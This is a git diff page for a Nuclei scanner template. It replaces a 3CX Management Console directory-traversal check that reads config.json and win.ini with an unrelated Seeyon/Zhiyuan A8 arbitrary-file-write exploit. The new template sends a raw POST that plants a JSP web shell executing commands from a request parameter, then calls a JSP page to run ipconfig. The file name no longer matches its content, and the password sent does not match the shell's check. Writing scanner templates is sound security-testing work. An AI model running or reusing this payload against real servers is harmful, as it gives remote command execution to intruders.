Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs
parent
800b77e71e
commit
7eb4817d1b
|
@ -1,35 +1,49 @@
|
|||
id: 3cx-management-console
|
||||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: 3CX Management Console - Directory Traversal
|
||||
author: random-robbie
|
||||
severity: high
|
||||
description: Directory traversal vulnerability on 3CX Management Console.
|
||||
name: Zhiyuan A8 Arbitrary File Write (RCE)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
reference:
|
||||
- https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
|
||||
metadata:
|
||||
shoda-query: http.title:"3CX Phone System Management Console"
|
||||
tags: 3cx,lfi,voip
|
||||
- https://www.cxyzjd.com/article/guangying177/110177339
|
||||
- https://github.com/sectestt/CNVD-2019-19299
|
||||
tags: zhiyuan,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
|
||||
- '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
|
||||
- raw:
|
||||
- |
|
||||
POST /seeyon/htmlofficeservlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
||||
OPTION=S3WYOSWLBSGr
|
||||
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
||||
= WUghPB3szB3Xwg66 the CREATEDATE
|
||||
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
||||
originalFileId = wV66
|
||||
originalCreateDate = wUghPB3szB3Xwg66
|
||||
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
||||
needReadFile = yRWZdAS6
|
||||
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
||||
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
||||
|
||||
- |
|
||||
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "CfgServerPassword"
|
||||
- "CfgServerAppName"
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_1, "htmoffice operate")'
|
||||
- 'contains(body_2, "Windows IP")'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
# Enhanced by cs on 2022/05/06
|
||||
|
|
Loading…
Reference in New Issue